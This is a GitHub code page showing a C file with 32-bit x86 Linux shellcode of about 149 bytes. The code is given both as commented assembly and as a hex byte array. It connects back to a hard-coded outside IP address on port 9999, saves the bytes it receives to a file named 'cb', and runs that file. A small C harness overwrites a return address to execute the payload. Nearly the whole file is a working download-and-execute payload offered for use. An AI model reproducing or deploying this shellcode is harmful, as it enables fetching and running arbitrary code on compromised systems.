-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathshellcode-206.c
executable file
·139 lines (111 loc) · 2.33 KB
/
shellcode-206.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
/*
;file download shellcode (149 bytes)
;
;connect back, download a file and execute.
;modify the name of the file and the ip address first.
;
;militan
;Advanced Defense Lab(ADL)
;
global _start
_start:
xor ecx,ecx
mul ecx
xor ebx,ebx
cdq
;socket
push eax
push byte 0x1
push byte 0x2
mov ecx,esp
inc ebx
mov al,0x66
int 0x80
mov edi,eax ;edi=sockfd
;connect,port(9999)=270f ip(140.115.53.35)=(8c.73.35.23)
push edx
push long 0x2335738c ;address *
push word 0x0f27 ;port *
mov dl,0x02
push dx ;family 1
mov ecx,esp ;adjust struct
push byte 0x10
push ecx
push edi ;sockfd
mov ecx,esp
mov bl,3
mov al,102
int 0x80
;sys_open(cb,O_WRONLY|O_CREATE|O_TRUNC[0001.0100.1000=1101],700)
xor ebx,ebx
xor ecx,ecx
push ecx
push word 0x6263 ;file name="cb"
mov ebx,esp
mov cx,0x242
mov dx,0x1c0 ;Octal
mov al,5
int 0x80
mov esi,eax ;esi=fd
;
xor ecx,ecx
mul ecx
cdq
mov dx,0x03e8 ;memory chunk=1000=0x03e8: read per time
L1:
;sys_read(socket sockfd,buf,len)
xor ebx,ebx
xor eax,eax
mov al,3
mov ebx,edi ;edi=sock fd
lea ecx,[esp-1000] ;memory chunk
int 0x80
;sys_write(fd,*buf,count)
mov ebx,esi
mov edx,eax
xor eax,eax
mov al,4
int 0x80
cmp dx,0x03e8
je L1 ;loop
CONTINUE:
;sys_close(fd)
mov ebx,esi
xor eax,eax
mov al,6
int 0x80
;execve[./cb,0]
xor ecx,ecx
mul ecx
push ecx
push word 0x6263 ;file name="cb"
mov ebx,esp
push ecx
push ebx
mov ecx,esp
mov al,0x0b
int 0x80
EXIT:
xor eax,eax
xor ebx,ebx
inc eax
int 0x80
*/
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
unsigned char shellcode[]="\x31\xc9\xf7\xe1\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\x43\xb0\x66\xcd\x80"
"\x89\xc7\x52\x68\x8c\x73\x35\x23\x66\x68\x27\x0f\xb2\x02\x66\x52\x89\xe1\x6a\x10\x51\x57\x89\xe1\xb3\x03\xb0\x66\xcd\x80"
"\x31\xdb\x31\xc9\x51\x66\x68\x63\x62\x89\xe3\x66\xb9\x42\x02\x66\xba\xc0\x01\xb0\x05\xcd\x80"
"\x89\xc6\x31\xc9\xf7\xe1\x99\x66\xba\xe8\x03\x31\xdb\x31\xc0\xb0\x03\x89\xfb\x8d\x8c\x24\x18\xfc\xff\xff\xcd\x80\x89\xf3\x89\xc2\x31\xc0\xb0\x04\xcd\x80"
"\x66\x81\xfa\xe8\x03\x74\xde\x89\xf3\x31\xc0\xb0\x06\xcd\x80\x31\xc9\xf7\xe1\x51\x66\x68\x63\x62\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"
"\x31\xc0\x31\xdb\x40\xcd\x80";
void k(){
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)shellcode;
}
int main (){
k();
return 0;
}